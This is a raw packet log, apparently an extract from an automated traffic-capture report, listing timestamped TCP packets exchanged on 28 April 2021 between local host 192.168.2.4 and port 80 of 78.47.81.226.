                                                                                                                                          Apr 28, 2021 22:58:42.776628971 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.776629925 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.776652098 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.776654959 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.776673079 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.776695967 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.776729107 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.777448893 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.777473927 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.777486086 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.777525902 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.777559042 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.863784075 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.933749914 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.933790922 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.933815956 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.933840036 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.933862925 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.933888912 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.933912992 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.933928967 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.933936119 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.933959961 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.933984995 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.933990955 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934007883 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934024096 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934031010 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934055090 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934056044 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934081078 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934094906 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934104919 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934127092 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934134960 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934150934 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934175014 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934175968 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934197903 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934221983 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934222937 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934245110 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934247971 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934269905 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934290886 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934294939 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934314966 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934325933 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934340000 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934361935 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934365034 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934384108 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934407949 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934408903 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934434891 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934436083 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934463024 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934473038 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934488058 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934497118 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934508085 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934523106 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934525013 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934541941 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934557915 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934559107 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934573889 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934592962 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934600115 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934612989 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934623957 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934632063 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934648991 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934662104 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934665918 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934683084 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934699059 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934701920 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934716940 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934731007 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934732914 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934753895 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934767008 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934772015 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934789896 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934799910 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934808016 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934823990 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934823990 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934840918 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934858084 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934863091 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934880018 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934904099 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934905052 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934928894 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934930086 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934952974 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934962034 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.934978962 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.934988976 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935004950 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935012102 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935028076 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935038090 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935044050 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935060978 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935075045 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935081005 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935100079 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935112000 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935117006 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935133934 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935144901 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935152054 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935168982 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935174942 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935187101 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935201883 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935205936 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935221910 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935240030 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935250998 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935256004 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935273886 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935292006 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935301065 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935309887 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935322046 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935326099 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935342073 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935349941 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935362101 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935379982 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935383081 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935396910 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935409069 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935414076 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935431957 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935447931 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935451031 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935465097 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935482025 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935496092 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935502052 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935519934 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935523987 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935532093 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935544014 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935556889 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935569048 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935580969 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935591936 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935605049 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935617924 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935631990 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935642958 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935653925 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935678005 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935682058 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935703039 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935709953 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935723066 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.935775042 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.935802937 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.936992884 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937026024 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937046051 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937057018 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937067032 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937078953 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937088013 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937112093 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937113047 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937133074 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937155962 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937158108 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937176943 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937187910 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937201023 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937222958 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937227964 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937247992 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937269926 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937271118 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937294960 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937299967 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937325001 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937334061 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937347889 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937364101 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937370062 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937406063 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937424898 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937439919 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937449932 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937469959 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937473059 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937495947 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937495947 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937524080 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937529087 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937546968 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937555075 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937571049 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937582016 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937594891 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937616110 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937619925 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937647104 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937650919 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937669992 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937693119 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937699080 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937717915 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937743902 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937743902 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937767982 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937768936 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937791109 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937813997 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937815905 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937841892 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937854052 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937864065 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937887907 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937891960 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937911034 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937932014 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937937021 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937952995 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937974930 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.937978983 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.937999010 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938009977 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938021898 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938045025 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938061953 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938065052 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938090086 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938091993 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938112020 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938122034 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938138008 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938158989 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938163996 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938183069 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938210011 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938226938 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938244104 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938250065 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938261032 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938277006 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938282967 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938294888 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938308001 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938311100 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938329935 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938348055 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938350916 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938364029 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938378096 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938384056 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938405991 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938412905 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938426018 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938436985 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938446999 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938467979 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938483000 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938493013 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938517094 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938522100 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938539028 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938546896 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938568115 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938591003 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938591957 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938616037 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938623905 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938640118 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938661098 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938666105 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938682079 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938703060 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938711882 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938724995 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938739061 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938741922 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938759089 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938785076 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938803911 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938805103 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938821077 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938839912 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938853979 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938860893 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938865900 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938882113 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938898087 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938899994 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938918114 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938934088 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938937902 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.938954115 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.938968897 CEST4973580192.168.2.478.47.81.226
